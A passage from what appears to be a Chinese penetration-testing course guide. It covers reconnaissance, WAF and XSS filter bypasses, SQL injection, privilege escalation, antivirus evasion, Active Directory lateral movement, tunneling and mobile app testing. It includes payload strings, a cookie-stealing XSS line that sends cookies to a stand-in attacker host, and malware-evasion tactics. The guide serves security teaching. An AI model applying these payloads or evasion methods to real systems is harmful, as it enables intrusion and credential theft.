小迪安全課件全面學(xué)習(xí)指南第一章網(wǎng)絡(luò)安全基礎(chǔ)與環(huán)境搭建網(wǎng)絡(luò)安全基礎(chǔ)概念網(wǎng)絡(luò)協(xié)議基礎(chǔ)深入理解互聯(lián)網(wǎng)通信的底層機(jī)制是安全研究的起點(diǎn)。HTTP/HTTPS協(xié)議控制著Web應(yīng)用的數(shù)據(jù)傳輸,TCP/IP協(xié)議棧則是整個(gè)互聯(lián)網(wǎng)通信的基石。掌握這些協(xié)議的工作原理,能夠幫助你更好地理解網(wǎng)絡(luò)攻擊的本質(zhì)。HTTP請(qǐng)求與響應(yīng)結(jié)構(gòu)解析HTTPS加密通信與證書驗(yàn)證TCP三次握手與四次揮手IP地址與路由轉(zhuǎn)發(fā)機(jī)制常見攻擊類型簡(jiǎn)介了解攻擊者的武器庫(kù)是防御的前提。SQL注入通過(guò)惡意SQL語(yǔ)句竊取數(shù)據(jù)庫(kù)信息,XSS跨站腳本攻擊盜取用戶憑證,CSRF跨站請(qǐng)求偽造利用用戶身份執(zhí)行惡意操作。這些經(jīng)典攻擊手法至今仍然威脅著大量Web應(yīng)用。SQL注入:數(shù)據(jù)庫(kù)攻擊利器XSS:客戶端腳本注入攻擊CSRF:利用身份偽造請(qǐng)求Web應(yīng)用架構(gòu)與環(huán)境Web服務(wù)器與中間件Web服務(wù)器是應(yīng)用運(yùn)行的核心平臺(tái)。IIS是Windows生態(tài)的首選,Apache和Nginx以高性能著稱,Tomcat專門服務(wù)Java應(yīng)用。不同服務(wù)器存在不同的安全特性和潛在漏洞。IIS配置與解析漏洞Apache/Nginx性能優(yōu)化Tomcat弱口令與后臺(tái)getshell數(shù)據(jù)庫(kù)類型及應(yīng)用數(shù)據(jù)庫(kù)是Web應(yīng)用的數(shù)據(jù)核心。MySQL廣泛應(yīng)用于中小型網(wǎng)站,Oracle服務(wù)大型企業(yè)系統(tǒng),Redis提供高速緩存服務(wù)。每種數(shù)據(jù)庫(kù)都有獨(dú)特的注入方式和提權(quán)技巧。MySQL注入與讀寫文件Oracle注入利用技術(shù)Redis未授權(quán)訪問(wèn)利用服務(wù)器操作系統(tǒng)操作系統(tǒng)決定了服務(wù)器的安全邊界。WindowsServer提供圖形化管理,Linux系統(tǒng)以穩(wěn)定性見長(zhǎng),MacOS服務(wù)器相對(duì)少見。不同系統(tǒng)的提權(quán)方法和防護(hù)策略各有特點(diǎn)。Windows權(quán)限管理機(jī)制Linux文件權(quán)限與SUID抓包技術(shù)與工具介紹抓包原理與流程抓包是滲透測(cè)試的眼睛,讓我們能夠看到客戶端與服務(wù)器之間的所有通信細(xì)節(jié)。通過(guò)設(shè)置代理服務(wù)器,將瀏覽器的流量引導(dǎo)到抓包工具,我們可以攔截、修改、重放HTTP請(qǐng)求,發(fā)現(xiàn)隱藏的漏洞點(diǎn)。BurpSuite抓包實(shí)戰(zhàn)BurpSuite是安全測(cè)試的瑞士軍刀。它不僅能抓包,還集成了漏洞掃描、暴力破解、編碼解碼等強(qiáng)大功能。掌握Proxy、Repeater、Intruder等核心模塊,能夠大幅提升測(cè)試效率。HTTPS抓包證書配置HTTPS加密通信為抓包帶來(lái)了挑戰(zhàn)。要成功抓取HTTPS流量,需要在客戶端安裝BurpSuite的CA證書,建立中間人代理。配置步驟包括:啟動(dòng)BurpSuite代理監(jiān)聽,默認(rèn):8080瀏覽器配置代理指向BurpSuite訪問(wèn)http://burp下載CA證書將證書導(dǎo)入系統(tǒng)受信任根證書頒發(fā)機(jī)構(gòu)重啟瀏覽器,即可抓取HTTPS流量"抓包是滲透測(cè)試的第一步,沒(méi)有流量分析就沒(méi)有漏洞發(fā)現(xiàn)。BurpSuite讓攻擊者的每一次請(qǐng)求都無(wú)所遁形。"第二章信息收集與資產(chǎn)識(shí)別資產(chǎn)識(shí)別技術(shù)域名指紋識(shí)別與子域名爆破主域名只是冰山一角,大量子域名隱藏著測(cè)試環(huán)境、后臺(tái)系統(tǒng)等高價(jià)值目標(biāo)。使用Layer子域名挖掘機(jī)、subDomainsBrute等工具,通過(guò)字典爆破和DNS查詢,可以發(fā)現(xiàn)大量被遺忘的資產(chǎn)。指紋識(shí)別通過(guò)分析HTTP響應(yīng)頭、頁(yè)面特征判斷CMS類型和版本。開源CMS及開發(fā)框架識(shí)別識(shí)別出WordPress、Dedecms、Thinkphp等常見CMS和框架,就能快速定位已知漏洞。WhatWeb、御劍指紋識(shí)別等工具通過(guò)特征匹配判斷技術(shù)棧。某些CMS存在默認(rèn)后臺(tái)路徑和弱口令,是快速getshell的捷徑。端口掃描與服務(wù)識(shí)別CDN繞過(guò)與真實(shí)IP獲取許多高價(jià)值目標(biāo)使用CDN加速服務(wù)隱藏真實(shí)服務(wù)器IP。CDN通過(guò)將內(nèi)容分發(fā)到全球節(jié)點(diǎn),提供加速的同時(shí)也增加了攻擊難度。繞過(guò)CDN獲取真實(shí)IP是滲透測(cè)試的關(guān)鍵一步。01歷史DNS記錄查詢目標(biāo)網(wǎng)站可能在使用CDN前暴露過(guò)真實(shí)IP。通過(guò)SecurityTrails、微步在線等平臺(tái)查詢歷史DNS解析記錄,有機(jī)會(huì)找到真實(shí)IP。02子域名與郵件服務(wù)器探測(cè)部分子域名或郵件服務(wù)器可能沒(méi)有使用CDN。通過(guò)mx記錄查詢、子域名掃描,可能發(fā)現(xiàn)與主站同機(jī)房的服務(wù)器,從而定位真實(shí)IP段。03全網(wǎng)掃描與證書匹配使用ZMap對(duì)全網(wǎng)443端口掃描,提取SSL證書信息。如果證書CN字段包含目標(biāo)域名,很可能就是真實(shí)服務(wù)器。Censys、Shodan等搜索引擎也收錄了大量證書數(shù)據(jù)。04社會(huì)工程學(xué)輔助定位通過(guò)目標(biāo)公司的招聘信息、技術(shù)博客、Github代碼泄露等,可能獲取機(jī)房位置、IP段等關(guān)鍵信息。whois查詢備案信息也能提供線索。漏洞掃描與蜜罐識(shí)別WAF防護(hù)識(shí)別與繞過(guò)技巧Web應(yīng)用防火墻(WAF)是滲透測(cè)試的第一道障礙。阿里云盾、安全狗、ModSecurity等WAF通過(guò)規(guī)則匹配攔截惡意請(qǐng)求。識(shí)別WAF類型是制定繞過(guò)策略的前提。識(shí)別方法:提交特殊Payload如'or1=1--,觀察返回的攔截頁(yè)面特征。Wafw00f工具可自動(dòng)識(shí)別WAF類型。繞過(guò)技巧:大小寫混淆:SeLEcT代替select編碼繞過(guò):URL編碼、Unicode編碼注釋分割:sel/**/ect等價(jià)函數(shù)替換:substring代替midHTTP參數(shù)污染:提交多個(gè)同名參數(shù)蜜罐陷阱識(shí)別案例蜜罐是安全團(tuán)隊(duì)部署的誘捕系統(tǒng),看似存在漏洞實(shí)則記錄攻擊行為。攻擊蜜罐可能導(dǎo)致真實(shí)身份暴露。識(shí)別特征:漏洞過(guò)于明顯,如SQL注入單引號(hào)直接報(bào)錯(cuò)目錄結(jié)構(gòu)異常,缺少真實(shí)業(yè)務(wù)數(shù)據(jù)響應(yīng)時(shí)間異常,數(shù)據(jù)庫(kù)查詢速度不合理開放大量高危端口如Telnet、FTP警惕:某些蜜罐會(huì)故意返回管理員密碼等誘餌信息,誘導(dǎo)攻擊者深入,切勿貪功冒進(jìn)。實(shí)戰(zhàn)中遇到可疑目標(biāo)應(yīng)及時(shí)停止測(cè)試。第三章Web攻防核心技術(shù)Web漏洞是互聯(lián)網(wǎng)安全的重災(zāi)區(qū)。從SQL注入到XSS,從文件上傳到命令執(zhí)行,這些經(jīng)典漏洞至今仍在威脅著無(wú)數(shù)網(wǎng)站。本章將深入剖析Web攻擊的原理與利用技術(shù),帶你掌握實(shí)戰(zhàn)中最有效的攻擊手法。SQL注入漏洞詳解SQL注入是Web安全的頭號(hào)威脅,通過(guò)構(gòu)造惡意SQL語(yǔ)句,攻擊者可以繞過(guò)認(rèn)證、讀取敏感數(shù)據(jù)、甚至獲取服務(wù)器權(quán)限。理解不同注入類型和利用技巧是每個(gè)安全從業(yè)者的必修課。注入類型全解析盲注通過(guò)真假判斷逐字猜解數(shù)據(jù)。布爾盲注利用頁(yè)面響應(yīng)差異,如1'and1=1--返回正常,1'and1=2--返回異常。時(shí)間盲注利用sleep()延遲響應(yīng)判斷,如1'andsleep(5)--。報(bào)錯(cuò)注入通過(guò)構(gòu)造錯(cuò)誤語(yǔ)句讓數(shù)據(jù)庫(kù)報(bào)錯(cuò)顯示信息,如updatexml()、extractvalue()函數(shù)。堆疊注入利用;分號(hào)執(zhí)行多條語(yǔ)句,可創(chuàng)建用戶、寫入文件。Sqlmap自動(dòng)化利用Sqlmap是SQL注入的終極武器。基礎(chǔ)用法:sqlmap-u"目標(biāo)URL"--batch自動(dòng)檢測(cè)。常用參數(shù):--dbs列出所有數(shù)據(jù)庫(kù)-D數(shù)據(jù)庫(kù)名--tables列表-T表名--columns列字段--dump導(dǎo)出數(shù)據(jù)--os-shell獲取系統(tǒng)shell--tamper繞過(guò)WAF進(jìn)階利用技術(shù)跨庫(kù)查詢:MySQL可通過(guò)information_schema庫(kù)獲取所有數(shù)據(jù)庫(kù)信息,實(shí)現(xiàn)跨庫(kù)注入。利用select*frommysql.user可讀取數(shù)據(jù)庫(kù)用戶密碼hash。二次注入:惡意數(shù)據(jù)第一次插入時(shí)被轉(zhuǎn)義,但從數(shù)據(jù)庫(kù)讀取后未再過(guò)濾,導(dǎo)致二次利用。常見于修改密碼、編輯資料等場(chǎng)景?？缯灸_本攻擊(XSS)三種XSS類型詳解反射型XSS:惡意腳本包含在URL中,服務(wù)器直接返回。如搜索框輸入<script>alert(1)</script>后頁(yè)面執(zhí)行。攻擊者誘導(dǎo)受害者點(diǎn)擊惡意鏈接觸發(fā)。存儲(chǔ)型XSS:惡意腳本存儲(chǔ)在服務(wù)器,所有訪問(wèn)者都會(huì)觸發(fā)。常見于評(píng)論、留言板。危害最大,可批量盜取Cookie。DOM型XSS:純客戶端漏洞,不經(jīng)過(guò)服務(wù)器。JavaScript直接將用戶輸入插入DOM。如document.write(location.hash)可導(dǎo)致DOMXSS。繞過(guò)過(guò)濾技巧WAF和過(guò)濾機(jī)制試圖攔截XSS,但總有繞過(guò)方法:大小寫混淆:<ScRiPt>雙寫繞過(guò):<scr<script>ipt>事件觸發(fā):<imgsrc=xonerror=alert(1)>編碼繞過(guò):<imgsrc=xonerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>換行繞過(guò):%0a<script>alert(1)</script>Cookie盜取與CSP防護(hù)XSS最常見利用是盜取Cookie。通過(guò)<script>newImage().src='http://攻擊者.com/?c='+document.cookie</script>可將Cookie發(fā)送到攻擊者服務(wù)器。獲得Cookie后可直接登錄受害者賬戶。防護(hù)機(jī)制:HttpOnly標(biāo)記使JavaScript無(wú)法讀取Cookie。CSP(內(nèi)容安全策略)限制腳本來(lái)源,阻止內(nèi)聯(lián)腳本執(zhí)行。但CSP配置不當(dāng)仍可繞過(guò),如允許unsafe-inline或存在JSONP端點(diǎn)。文件上傳與遠(yuǎn)程代碼執(zhí)行(RCE)文件上傳漏洞成因開發(fā)者對(duì)上傳文件類型校驗(yàn)不嚴(yán),允許上傳可執(zhí)行腳本如PHP、JSP、ASP。攻擊者上傳Webshell后,可遠(yuǎn)程執(zhí)行任意命令,完全控制服務(wù)器。黑白名單繞過(guò)白名單只允許特定后綴,可嘗試雙后綴shell.php.jpg、大小寫shell.phP、解析漏洞shell.php.xxx。黑名單過(guò)濾不全,可用phtml、php5等后綴。免殺與隱藏技術(shù)WAF和殺軟檢測(cè)Webshell特征,需要免殺處理。加密編碼:base64_decode、gzinflate解碼執(zhí)行。函數(shù)變形:assert、call_user_func動(dòng)態(tài)調(diào)用。RCE命令執(zhí)行除上傳外,eval()、system()等函數(shù)也可能造成RCE。無(wú)回顯時(shí)使用curl外帶、DNS日志、sleep延遲等確認(rèn)漏洞。反彈shell獲得交互終端。實(shí)戰(zhàn)技巧:上傳圖片馬后配合文件包含漏洞、解析漏洞、.htaccess配置等getshell。中國(guó)菜刀、蟻劍、冰蝎等Webshell管理工具是后滲透利器。從信息收集到漏洞利用的攻防鏈條完整的滲透測(cè)試遵循系統(tǒng)化流程:信息收集識(shí)別攻擊面→漏洞掃描發(fā)現(xiàn)薄弱點(diǎn)→漏洞驗(yàn)證確認(rèn)可利用→權(quán)限獲取控制系統(tǒng)→權(quán)限提升擴(kuò)大戰(zhàn)果→內(nèi)網(wǎng)滲透橫向移動(dòng)→數(shù)據(jù)竊取達(dá)成目標(biāo)→痕跡清理安全撤離。每個(gè)階段環(huán)環(huán)相扣,前期信息收集越充分,后期攻擊越精準(zhǔn)。漏洞利用不是目的,獲取敏感數(shù)據(jù)、證明安全風(fēng)險(xiǎn)才是核心價(jià)值。專業(yè)滲透測(cè)試必須遵守授權(quán)范圍,在獲得書面許可后方可實(shí)施。第四章權(quán)限提升與免殺對(duì)抗獲得初始訪問(wèn)權(quán)限只是開始,從普通用戶提升到管理員、從Webshell到系統(tǒng)Shell,權(quán)限提升是滲透深入的關(guān)鍵。同時(shí),免殺技術(shù)讓我們的工具能夠繞過(guò)殺軟檢測(cè),在實(shí)戰(zhàn)中暢通無(wú)阻。本章揭秘提權(quán)與免殺的核心技術(shù)。權(quán)限提升技術(shù)1Windows本地提權(quán)Windows提權(quán)利用系統(tǒng)漏洞和錯(cuò)誤配置。令牌竊取:通過(guò)incognito等工具竊取SYSTEM令牌,假冒高權(quán)限用戶。UAC繞過(guò):利用白名單程序如eventvwr.exe繞過(guò)用戶賬戶控制。DLL劫持:程序加載DLL時(shí)未指定完整路徑,將惡意DLL放在搜索路徑前,實(shí)現(xiàn)劫持。服務(wù)提權(quán):利用弱服務(wù)權(quán)限,替換服務(wù)可執(zhí)行文件或修改服務(wù)路徑。漏洞利用:MS17-010永恒之藍(lán)、CVE-2019-0708藍(lán)屏漏洞等系統(tǒng)漏洞是提權(quán)捷徑。使用Metasploit的local_exploit_suggester模塊自動(dòng)尋找可利用漏洞。2Linux提權(quán)案例Linux提權(quán)需要深入理解權(quán)限機(jī)制。SUID濫用:查找設(shè)置了SUID位的可執(zhí)行文件find/-perm-4000,利用nmap、vim等程序提權(quán)。內(nèi)核漏洞:臟牛漏洞(CVE-2016-5195)等可直接提權(quán)到root。定時(shí)任務(wù)濫用:crontab定時(shí)任務(wù)以root運(yùn)行,如果可寫入任務(wù)配置,可執(zhí)行惡意腳本。sudo配置錯(cuò)誤:sudo-l查看可執(zhí)行命令,利用通配符、環(huán)境變量注入等提權(quán)。密碼破解:/etc/shadow存儲(chǔ)密碼hash,john、hashcat等工具可離線爆破。弱密碼是提權(quán)常見突破口。3AD域控提權(quán)ActiveDirectory域環(huán)境是企業(yè)內(nèi)網(wǎng)核心。Kerberoasting:請(qǐng)求服務(wù)票據(jù),離線破解服務(wù)賬戶密碼。AS-REPRoasting:對(duì)禁用預(yù)認(rèn)證的賬戶進(jìn)行攻擊。黃金票據(jù):偽造TGT票據(jù),獲取任意用戶權(quán)限。白銀票據(jù):偽造TGS服務(wù)票據(jù)訪問(wèn)特定服務(wù)。DCSync:模擬域控制器,遠(yuǎn)程導(dǎo)出域用戶hash。永恒之藍(lán):MS17-010漏洞在域環(huán)境中擴(kuò)散極快,是內(nèi)網(wǎng)滲透利器。BloodHound可視化域攻擊路徑,自動(dòng)尋找到域控最短路徑。免殺技術(shù)詳解免殺的本質(zhì)殺軟通過(guò)特征碼匹配、行為監(jiān)控、沙箱檢測(cè)等方式識(shí)別惡意代碼。免殺就是對(duì)抗這些檢測(cè)機(jī)制,讓惡意代碼看起來(lái)無(wú)害。靜態(tài)免殺修改代碼特征,動(dòng)態(tài)免殺對(duì)抗行為分析。核心免殺技術(shù)Shellcode混淆:將原始shellcode進(jìn)行XOR、AES加密,運(yùn)行時(shí)動(dòng)態(tài)解密。使用花指令、垃圾代碼增加代碼熵值,破壞特征匹配。PowerShell免殺:PowerShell是Windows原生工具,白利用難以檢測(cè)。通過(guò)編碼混淆、分段加載、內(nèi)存注入等技術(shù)執(zhí)行payload。Invoke-Obfuscation工具可自動(dòng)混淆PS腳本。反沙盒技術(shù):沙箱環(huán)境資源有限、時(shí)間短暫。通過(guò)檢測(cè)CPU核心數(shù)、內(nèi)存大小、運(yùn)行時(shí)間、虛擬機(jī)特征等識(shí)別沙箱。檢測(cè)到沙箱后終止運(yùn)行或執(zhí)行無(wú)害行為。反調(diào)試技術(shù):檢測(cè)調(diào)試器存在,如IsDebuggerPresent()、時(shí)間差檢測(cè)、父進(jìn)程檢測(cè)等。發(fā)現(xiàn)調(diào)試器后終止進(jìn)程或觸發(fā)異常。免殺實(shí)戰(zhàn)案例C/C++溯源繞過(guò)C編譯生成的PE文件是木馬常用載體。使用加殼工具如UPX、VMProtect保護(hù)程序,增加逆向難度。代碼級(jí)免殺通過(guò)修改函數(shù)調(diào)用方式、字符串加密、動(dòng)態(tài)導(dǎo)入API實(shí)現(xiàn)。分離式加載將shellcode與加載器分離,加載器從遠(yuǎn)程下載或本地讀取加密的shellcode,內(nèi)存中解密執(zhí)行。進(jìn)程注入技術(shù)將惡意代碼注入到合法進(jìn)程如explorer.exe,隱藏惡意行為。Python混淆與打包Python腳本易讀易分析,需要深度混淆。PyArmor可加密py文件,Pyinstaller、py2exe打包成exe。但Python解釋器特征明顯,容易被殺軟識(shí)別。進(jìn)階方案是將核心功能用C編寫為pyd動(dòng)態(tài)庫(kù),Python僅做調(diào)用。使用exec()、eval()動(dòng)態(tài)執(zhí)行字符串代碼,配合base64、zlib等多層編碼。內(nèi)存執(zhí)行技術(shù)直接在內(nèi)存中運(yùn)行bytecode,不落地磁盤。Office宏病毒免殺Office宏病毒通過(guò)誘導(dǎo)用戶啟用宏執(zhí)行惡意VBA代碼。宏免殺需要混淆VBA代碼:字符串拼接、變量名隨機(jī)化、代碼分段執(zhí)行。Auto_Open()自動(dòng)執(zhí)行宏,無(wú)需用戶交互。宏代碼可下載執(zhí)行遠(yuǎn)程payload,或直接嵌入shellcode。使用msfvenom生成VBA格式shellcode,嵌入Word文檔。DDE(動(dòng)態(tài)數(shù)據(jù)交換)、公式注入等無(wú)宏利用方式更加隱蔽,但支持范圍有限。免殺原則:不使用公開工具原始特征,自己編寫加載器。每次行動(dòng)使用不同的混淆方式,避免特征積累。定期在VirusTotal等平臺(tái)檢測(cè)免殺效果,但注意樣本會(huì)被共享給殺軟廠商。第五章內(nèi)網(wǎng)安全與橫向移動(dòng)突破邊界只是萬(wàn)里長(zhǎng)征第一步,真正的寶藏藏在內(nèi)網(wǎng)深處。從跳板機(jī)到核心服務(wù)器,從普通域用戶到域管理員,內(nèi)網(wǎng)滲透是層層深入的藝術(shù)。本章將揭示內(nèi)網(wǎng)偵察、橫向移動(dòng)、域滲透的核心技術(shù),帶你征服企業(yè)內(nèi)網(wǎng)。內(nèi)網(wǎng)資產(chǎn)偵察進(jìn)入內(nèi)網(wǎng)后,首要任務(wù)是摸清網(wǎng)絡(luò)拓?fù)?、主機(jī)資產(chǎn)、域架構(gòu)。信息收集越全面,后續(xù)攻擊路徑越清晰。主機(jī)信息收集Windows:ipconfig查看網(wǎng)卡IP,netuser查看本地用戶,netlocalgroupadministrators查看管理員,systeminfo查看系統(tǒng)補(bǔ)丁,tasklist查看進(jìn)程。Linux:ifconfig、ipaddr查看網(wǎng)絡(luò),whoami當(dāng)前用戶,cat/etc/passwd查看所有用戶,psaux查看進(jìn)程,crontab-l查看定時(shí)任務(wù)。域環(huán)境識(shí)別判斷是否加入域:netconfigworkstation查看域名,echo%logonserver%查看域控。BloodHound是域偵察神器,通過(guò)LDAP查詢自動(dòng)繪制域攻擊路徑,找到到域管最短路徑。Adfind:命令行AD查詢工具,adfind-fobjectclass=computer導(dǎo)出所有計(jì)算機(jī),adfind-scadmincounts查找高權(quán)限用戶。PowerView:PowerShell域偵察模塊,功能強(qiáng)大但易被檢測(cè)。網(wǎng)絡(luò)拓?fù)涮綔y(cè)通過(guò)ARP掃描發(fā)現(xiàn)同網(wǎng)段主機(jī),nbtscan掃描NetBIOS信息。內(nèi)網(wǎng)端口掃描使用fscan、ladon等輕量工具,避免觸發(fā)IDS告警。關(guān)注關(guān)鍵服務(wù)器:域控DC(88,389,636端口)、文件服務(wù)器(445端口)、數(shù)據(jù)庫(kù)服務(wù)器(1433,3306端口)、郵件服務(wù)器(25,110,143端口)、OA辦公系統(tǒng)(80,443端口)。防火墻規(guī)則與代理技術(shù)內(nèi)網(wǎng)可能存在防火墻策略限制,某些主機(jī)無(wú)法直接訪問(wèn)。需要通過(guò)已控主機(jī)搭建代理或隧道。常用工具:frp內(nèi)網(wǎng)穿透,EarthWorm(EW)多級(jí)代理,reGeorg正向Socks代理,Neo-reGeorg支持加密傳輸。配置Proxifier或Proxychains使本地工具通過(guò)代理訪問(wèn)內(nèi)網(wǎng)。橫向移動(dòng)技術(shù)1SMB協(xié)議攻擊SMB(445端口)是Windows文件共享協(xié)議。psexec:通過(guò)SMB遠(yuǎn)程執(zhí)行命令,需要管理員權(quán)限。Pass-the-Hash:無(wú)需知道明文密碼,使用NTLMhash即可認(rèn)證,mimikatz可導(dǎo)出hash。永恒之藍(lán):MS17-010SMB漏洞,可直接getshell,內(nèi)網(wǎng)傳播極快。2WMI遠(yuǎn)程執(zhí)行WMI是Windows管理工具,可遠(yuǎn)程執(zhí)行命令。wmic/node:目標(biāo)IP/user:用戶/password:密碼processcallcreate"cmd.exe"。WMI攻擊無(wú)文件落地,隱蔽性強(qiáng),但需要管理員權(quán)限和防火墻放行135端口。3Kerberos票據(jù)攻擊黃金票據(jù):獲取krbtgt賬戶hash后,可偽造任意用戶TGT票據(jù),擁有整個(gè)域最高權(quán)限。白銀票據(jù):偽造特定服務(wù)TGS票據(jù),如CIFS、HTTP服務(wù)。票據(jù)傳遞:導(dǎo)出當(dāng)前用戶Kerberos票據(jù),注入到新進(jìn)程實(shí)現(xiàn)權(quán)限切換。4NTLM中繼攻擊中間人劫持NTLM認(rèn)證流量,將認(rèn)證請(qǐng)求轉(zhuǎn)發(fā)到目標(biāo)服務(wù)器。Responder工具可進(jìn)行LLMNR/NBT-NS欺騙,獲取Net-NTLMv2hash。配合ntlmrelayx將認(rèn)證中繼到SMB、LDAP等服務(wù),實(shí)現(xiàn)無(wú)密碼橫向。5域控DCSync攻擊DCSync利用目錄復(fù)制服務(wù),模擬域控向另一個(gè)域控同步數(shù)據(jù)。使用mimikatz的lsadump::dcsync命令,可遠(yuǎn)程導(dǎo)出任意域用戶的密碼hash,包括krbtgt,進(jìn)而偽造黃金票據(jù)。隧道搭建與通信隱蔽SSH隧道技術(shù)SSH是Linux標(biāo)配,可搭建加密隧道。本地轉(zhuǎn)發(fā):ssh-L本地端口:目標(biāo):目標(biāo)端口跳板機(jī),將內(nèi)網(wǎng)服務(wù)映射到本地。遠(yuǎn)程轉(zhuǎn)發(fā):ssh-R跳板端口:目標(biāo):目標(biāo)端口,將本地服務(wù)暴露給內(nèi)網(wǎng)。動(dòng)態(tài)轉(zhuǎn)發(fā):ssh-D1080跳板機(jī),建立Socks5代理,本地工具可通過(guò)此代理訪問(wèn)整個(gè)內(nèi)網(wǎng)。SSH隧道加密傳輸,難以被檢測(cè)。DNS隧道傳輸DNS流量通常不被攔截,可用于數(shù)據(jù)傳輸。dnscat2、iodine等工具將數(shù)據(jù)編碼為DNS查詢,通過(guò)公網(wǎng)DNS服務(wù)器與C2服務(wù)器通信。原理:控制的域名NS記錄指向C2服務(wù)器,內(nèi)網(wǎng)受控主機(jī)查詢子域名(數(shù)據(jù)編碼).,查詢請(qǐng)求到達(dá)C2服務(wù)器,完成通信。傳輸速度慢但隱蔽性極強(qiáng)。ICMP隧道繞過(guò)ICMP(ping)協(xié)議常被忽視,可用于隱蔽通信。icmpsh、ptunnel等工具通過(guò)ICMPecho請(qǐng)求/響應(yīng)傳輸數(shù)據(jù),將shell命令和返回結(jié)果編碼在ICMP包中。優(yōu)點(diǎn)是ICMP流量較少被監(jiān)控,防火墻一般放行。缺點(diǎn)是傳輸效率低,容易被流量分析發(fā)現(xiàn)異常。適合低頻控制通信。反向連接:內(nèi)網(wǎng)主機(jī)主動(dòng)連接外網(wǎng)C2服務(wù)器,繞過(guò)防火墻入站限制。Metasploit的reverse_tcp、CobaltStrike的beacon都是反向連接。配合域前置、CDN等技術(shù),可隱藏真實(shí)C2服務(wù)器IP。第六章移動(dòng)端與APP攻防移動(dòng)互聯(lián)網(wǎng)時(shí)代,APP成為新的攻擊面。從Android到iOS,從APP到小程序,移動(dòng)安全有著獨(dú)特的攻擊技術(shù)和防護(hù)機(jī)制。本章將帶你了解移動(dòng)安全的核心知識(shí),掌握APP滲透測(cè)試的關(guān)鍵技能。移動(dòng)安全基礎(chǔ)Android架構(gòu)與安全Android基于Linux內(nèi)核,應(yīng)用運(yùn)行在Dalvik/ART虛擬機(jī)中。APK文件本質(zhì)是ZIP壓縮包,包含DEX字節(jié)碼、資源文件、簽名信息。安全機(jī)制:沙箱隔離每個(gè)APP獨(dú)立運(yùn)行,權(quán)限系統(tǒng)控制敏感操作,代碼簽名驗(yàn)證APP完整性。但root后這些機(jī)制失效,給安全測(cè)試提供了便利。常見漏洞:組件暴露(Activity/Service/BroadcastReceiver/ContentProvider)可被惡意調(diào)用,WebView漏洞導(dǎo)致RCE,不安全的數(shù)據(jù)存儲(chǔ)泄露敏感信息,代碼混淆不足易被逆向。iOS架構(gòu)與安全iOS基于Darwin內(nèi)核,應(yīng)用運(yùn)行在沙箱中。IPA文件包含ARM二進(jìn)制、資源、簽名。iOS審核嚴(yán)格,安全性高于Android。安全機(jī)制:代碼簽名強(qiáng)制驗(yàn)證,沙箱限制文件訪問(wèn),ASLR/DEP阻止代碼注入,Keychain安全存儲(chǔ)密鑰。越獄(Jailbreak)破解系統(tǒng)限制,安裝Cydia,獲取root權(quán)限。常見漏洞:URLScheme劫持,NSUserDefaults不安全存儲(chǔ),Keychain訪問(wèn)控制不當(dāng),網(wǎng)絡(luò)通信未使用證書綁定,二進(jìn)制未混淆被逆向。反編譯與混淆對(duì)抗Android反編譯:apktool解包APK,dex2jar轉(zhuǎn)換DEX為JAR,jd-gui反編譯JAR查看源碼。代碼混淆使用ProGuard/R8,將類名方法名替換為a、b、c等無(wú)意義字符。iOS反編譯:Clutch、frida-ios-dump砸殼脫去加密殼,class-dump導(dǎo)出類信息,Hopper/IDA反匯編分析邏輯。代碼混淆工具如obfuscator-llvm、hikari增加逆向難度。對(duì)抗混淆:動(dòng)態(tài)調(diào)試?yán)@過(guò)混淆,靜態(tài)分析尋找關(guān)鍵字符串,符號(hào)執(zhí)行還原控制流,機(jī)器學(xué)習(xí)識(shí)別混淆模式?；煜黾与y度但無(wú)法完全阻止逆向。APP抓包與證書繞過(guò)移動(dòng)APP抓包是安全測(cè)試的基礎(chǔ),但HTTPS加密和證書校驗(yàn)給抓包帶來(lái)了挑戰(zhàn)。掌握抓包和證書繞過(guò)技術(shù),能夠讓你看到APP與服務(wù)器之間的所有通信。01配置抓包代理手機(jī)和電腦連接同一WiFi,手機(jī)WiFi設(shè)置中配置HTTP代理指向電腦IP:8080。電腦啟動(dòng)BurpSuite或Charles監(jiān)聽8080端口。此時(shí)HTTP流量可被抓取,但HTTPS會(huì)報(bào)證書錯(cuò)誤。02安裝CA證書瀏覽器訪問(wèn)http://burp或/ssl下載證書。Android將證書安裝到"受信任的憑據(jù)",iOS在設(shè)置-通用-描述文件安裝后還需在設(shè)置-通用-關(guān)于本機(jī)-證書信任設(shè)置中啟用。03繞過(guò)證書校驗(yàn)部分APP會(huì)進(jìn)行SSLPinning證書綁定,只信任特定證書,拒絕代理證書。Xposed框架:安裝JustTrustMe、SSLUnpinning模塊全局繞過(guò)SSLPinning。Frida:注入JS腳本HookSSL驗(yàn)證函數(shù),返回true繞過(guò)。04高級(jí)繞過(guò)技術(shù)某些APP檢測(cè)代理、檢測(cè)Xposed、多層加密。需要修改smali代碼重打包,或使用VirtualXposed虛擬環(huán)境。網(wǎng)絡(luò)層抓包用Wireshark、tcpdump抓取原始流量,配合密鑰破解TLS。小程序安全小程序架構(gòu)與反編譯微信小程序基于JavaScript開發(fā),運(yùn)行在微信提供的環(huán)境中。小程序包wxapkg是加密的,但加密算法已被破解。解包工具:wxappUnpacker、unwxapkg可解密wxapkg,還原出wxml(結(jié)構(gòu))、wxss(樣式)、js(邏輯)文件。通過(guò)解包可以查看小程序完整源碼,分析業(yè)務(wù)邏輯和接口。動(dòng)態(tài)調(diào)試:微信開發(fā)者工具打開解包后的代碼,可以打斷點(diǎn)調(diào)試,查看變量,修改邏輯。ChromeDevTools遠(yuǎn)程調(diào)試真機(jī)小程序,抓取網(wǎng)絡(luò)請(qǐng)求。資產(chǎn)提取與接口安全資產(chǎn)提取:解包后可獲取小程序內(nèi)所有圖片、音頻、視頻等資源文件。敏感信息如API密鑰、服務(wù)器地址可能硬編碼在JS中。接口安全檢測(cè):小程序通過(guò)wx.request調(diào)用后端接口,抓包分析接口參數(shù)、返回?cái)?shù)據(jù)。常見問(wèn)題:接口未做鑒權(quán)任意用戶可調(diào)用,越權(quán)訪問(wèn)他人數(shù)據(jù),敏感信息明文傳輸,業(yè)務(wù)邏輯漏洞如金額篡改、優(yōu)惠券重復(fù)使用。防護(hù)建議:代碼混淆、接口簽名驗(yàn)證、服務(wù)端權(quán)限校驗(yàn)、敏感數(shù)據(jù)加密傳輸。但小程序前端本質(zhì)是開放的,關(guān)鍵安全邏輯必須在服務(wù)端實(shí)現(xiàn)。第七章加密算法與安全防護(hù)加密是保護(hù)數(shù)據(jù)安全的核心技術(shù),從簡(jiǎn)單的Base64編碼到復(fù)雜的RSA非對(duì)稱加密,理解加密算法的原理和應(yīng)用場(chǎng)景是安全從業(yè)者的必備知識(s